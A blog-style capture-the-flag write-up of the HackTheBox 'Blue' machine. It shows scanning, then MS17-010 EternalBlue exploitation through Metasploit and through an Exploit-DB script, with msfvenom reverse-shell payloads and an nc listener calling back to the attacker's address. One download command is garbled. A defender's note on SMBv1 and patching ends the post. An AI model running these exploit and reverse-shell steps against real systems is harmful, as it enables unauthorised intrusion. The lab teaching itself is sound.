WriteUp: HackTheBox Blue

Getting back on HTB. Last time, I had to shift focus after 1 or 2 boxes and did not even have a writeup for them. Let’s see how long I’ll last this time round :). I’m basically starting from scratch now so let’s just say, this is my very first box in my list of X Boxes to come. It’s a windows machine rated easy. It’s running a vulnerable SMB version and hence, we are able to gain both user and system access.

Table of Contents

  1. Reconnaissance
  2. Enumeration
  3. Exploitation using Metasploit
  4. Exploitation without Metasploit
  5. Post Exploitation
  6. Defender’s Note

Reconnaissance

Let’s start by checking which open ports are available on the machine.

$ nmap -A -T4 -p- 10.10.10.40

The output that we get

PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -12m42s, deviation: 34m36s, median: 7m15s
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-06-23T08:05:35+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-06-23T07:05:33
|_  start_date: 2021-06-23T06:57:15

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.15 seconds

We get a bunch of RPC ports open along with SMB. RPC is common to see with SMB but let’s try follow the SMB trail. We see that the machine is running Windows 7 SP 1. When I do a quick google search to see whether there are possible vulnerabilities with this version of Windows, the first hit we see points to EternalBlue. MS17-010 EternalBlue is a vulnerability that allowed for Remote Code Execution on Windows machines.

Enumeration

We can also use Nmap scripts to check for existing vulnerabilities on SMB.

$ nmap --script smb-vuln* -sV -v -p 139,445 10.10.10.40

The output that we get shows that the machine is indeed vulnerable to ms17-010.

PORT    STATE SERVICE      VERSION
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Exploitation using Metasploit

We can first try pawning this using Metasploit. Does Metasploit have the MS17-010 exploit module available?

$ msfconsole
$ msf6 > search ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index. For example info 5, use 5 or use exploit/windows/smb/smb_doublepulsar_rce

Indeed it does. We see a scanner (2) and a couple of exploits (2-4).

Let’s first verify that the vulnerability does indeed exist on the machine. For that, we will use the scanner module. Let’s check which options are required to use this module.

msf6 > use auxiliary/scanner/smb/smb_ms17_010 
msf6 auxiliary(scanner/smb/smb_ms17_010) > options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads (max one per host)

We see that we need to have at least four options: RHOSTS, RPORT, NAMED_PIPES and THREADS. We can see that three of the options are already set, so we only need the RHOSTS value that is currently not set by default.

msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.10.10.40
rhosts => 10.10.10.40

Let’s also double check the path to the NAMED_PIPES as that is required. As we can see, the file does exists and has default content in it.

$ cat /usr/share/metasploit-framework/data/wordlists/named_pipes.txt
netlogon
lsarpc
samr
browser
atsvc
DAV RPC SERVICE
epmapper
eventlog
InitShutdown
keysvc
lsass
LSM_API_service
ntsvcs
plugplay
protected_storage
router
SapiServerPipeS-1-5-5-0-70123
scerpc
srvsvc
tapsrv
trkwks
W32TIME_ALT
wkssvc
PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
db2remotecmd

Let’s now run the exploit.

msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The output shows that the machine is likely vulnerable to MS17-010. Now that we have verified that, we can now use the exploit module on that machine. As this is a Windows 7 machine, we can try using module 2 or 4 that we found as we see that module 3 is specific for Windows 8+ machines. Let’s first attempt using exploit module 2.

msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.176.95   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

We see that default options exists for the required options except for RHOSTS. We will also need to modify the LHOST IP to the IP of our VPN. Let’s double check our IP address for the tunnel.

$ ifconfig                                                                                                              
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1500                                                                                                                   
        inet 10.10.14.6  netmask 255.255.254.0  destination 10.10.14.6                                                                                                               
        inet6 fe80::9440:3242:5d61:5230  prefixlen 64  scopeid 0x20<link>                                                                                                            
        inet6 dead:beef:2::1004  prefixlen 64  scopeid 0x0<global>                                                                                                                   
        unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  txqueuelen 500  (UNSPEC)                                                                                             
        RX packets 26  bytes 2802 (2.7 KiB)                                                                                                                                          
        RX errors 0  dropped 0  overruns 0  frame 0                                                                                                                                  
        TX packets 50  bytes 4402 (4.2 KiB)                                                                                                                                          
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Let’s set the RHOSTS and LHOST then run the module.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
RHOSTS => 10.10.10.40
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.6
LHOST => 10.10.14.6
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

The output that we get is as below.

[*] Started reverse TCP handler on 10.10.14.6:4444 
[*] 10.10.10.40:445 - Executing automatic check (disable AutoCheck to override)
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445       - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.40:445 - The target is vulnerable.
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445       - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 10.10.10.40
[*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.40:49158) at 2021-06-23 09:37:22 +0100
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > 

From the output, se wee that we have “ETERNALBLUE overwrite completed successfully”. Let’s now drop into a shell on the pawned computer.

meterpreter > shell
Process 540 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

We see that we have authority “system” on the machine. Now, lets look for the flag on this machine. We can drop to “C” and check the users and Administrator folders.

C:\Windows\system32>cd ..\..
cd ..\..

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A0EF-1911

 Directory of C:\

14/07/2009  04:20    <DIR>          PerfLogs
24/12/2017  03:23    <DIR>          Program Files
14/07/2017  17:58    <DIR>          Program Files (x86)
14/07/2017  14:48    <DIR>          Share
21/07/2017  07:56    <DIR>          Users
15/01/2021  11:42    <DIR>          Windows
               0 File(s)              0 bytes
               6 Dir(s)  17,256,079,360 bytes free

C:\>cd Users    
cd Users

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A0EF-1911

 Directory of C:\Users

21/07/2017  07:56    <DIR>          .
21/07/2017  07:56    <DIR>          ..
21/07/2017  07:56    <DIR>          Administrator
14/07/2017  14:45    <DIR>          haris
12/04/2011  08:51    <DIR>          Public
               0 File(s)              0 bytes
               5 Dir(s)  17,256,079,360 bytes free

We see that we have a user called “Haris” and an “Administrator”.

Exploitation without Metasploit

Before we get the flags, let’s try exploit the box without using metasploit.

We can search for an exploit from Exploit DB.

$ searchsploit --id ms17-010

We get the output seen blow.

We can pick an exploit works on windows 7 machines. I’ll go with 42315.

We can copy the exploit to our folder using the mirror command

$ searchsploit -m 42315
  Exploit: Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
      URL: https://www.exploit-db.com/exploits/42315
     Path: /usr/share/exploitdb/exploits/windows/remote/42315.py
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /home/XXXX/Downloads/42315.py

When we read the source file downloaded, a couple of things come up. First, we need to download the mysmb.py file from the specified URL

$ wget https://githuhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42315.py
//
HTTP request sent, awaiting response... 200 OK
Length: 16669 (16K) [text/plain]
Saving to: ‘42315.py.1’

42315.py.1                                    100%[==============================================================================================>]  16.28K  --.-KB/s    in 0.002s  

2021-06-23 11:56:02 (6.76 MB/s) - ‘42315.py.1’ saved [16669/16669]

Let’s rename the file accordingly.

$ mv 42315.py.1 mysmb.py

We also see in the exploit that we need a username and password.

Let’s check to see which logins are allowed on the Windows machine.

$ enum4linux -a 10.10.10.40
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Jun 23 12:04:37 2021

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.10.40
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

We see that we do have “administrator” and “guest” allowed. Let’s first try with guest since these are normally weaker targets. We need to edit the script and insert the username. We don’t have a password.

From this section, we also see that we need to create a reverse shell payload eg. using the example given “msfvenom”.

$ msfvenom -p windows/shell_reverse_tcp -f exe LHOST=10.10.14.6 LPORT=4444 > eternal-blue.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes

Let’s now add the location of the payload to the exploit code.

We are now ready. Let’s setup a listener on our machine.

$ nc -nlvp 4444

It’s now time to run the exploit.

$ python 42315.py 10.10.10.40
Target OS: Windows 7 Professional 7601 Service Pack 1
Using named pipe: samr
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
CONNECTION: 0xfffffa80045f5920
SESSION: 0xfffff8a002c22de0
FLINK: 0xfffff8a002e6d088
InParam: 0xfffff8a002e6715c
MID: 0x3803
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
creating file c:\pwned.txt on the target
Opening SVCManager on 10.10.10.40.....
Creating service RZsc.....
Starting service RZsc.....
The NETBIOS connection with the remote host timed out.
Removing service RZsc.....
ServiceExec Error on: 10.10.10.40
nca_s_proto_error
Done

When we go back to the listener terminal, we see that a session with the host is not setup as system.

$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.40] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

Post Exploitation

The user flag is normally located on a desktop of a normal user (C:\Documents and Settings\User\Desktop). In this case, we need to traverse to the desktop of user “Haris”. Once in the directory, we see the “user.txt” file which we can read the contents of using the “type” command.

C:\Users\haris>cd Desktop
cd Desktop

C:\Users\haris\Desktop>dir              
dir
 Volume in drive C has no label.
 Volume Serial Number is A0EF-1911

 Directory of C:\Users\haris\Desktop

24/12/2017  03:23    <DIR>          .
24/12/2017  03:23    <DIR>          ..
21/07/2017  07:54                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  17,256,079,360 bytes free

C:\Users\haris\Desktop>type user.txt    
type user.txt
4c546XXXXXXXXXXXXXXXXeea9

The root flag is normally located on a desktop of Administrator (C:\Documents and Settings\Administrator\Desktop). Once in the directory, we see the “root.txt” file which we can read the contents of using the “type” command.

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A0EF-1911

 Directory of C:\Users\Administrator\Desktop

24/12/2017  03:22    <DIR>          .
24/12/2017  03:22    <DIR>          ..
21/07/2017  07:57                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  17,256,079,360 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
ff548eXXXXXXXXXXXXXXXXXX4e717

Defenders Note

  1. SMBv1 is known to be vulnerable to a bunch of vulnerabilities that are easily exploitable in the wild. You would be better off not using it. Use the latest version (SMBv3) if at all possible.
  2. Patch systems in a timely manner. The vulnerability we exploited here was patched in 2017. If you still have your systems unpatched, your simply asking for trouble.
  3. Older versions of windows may lack support for newer protocols (eg. SMBv3). Getting rid of older windows versions from your environment just makes attackers’ lives a little more complicated.
  4. We were able to get in using a guest user. Harden users or get rid of unnecessary users on host machines.

That’s all for now. Adios!

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s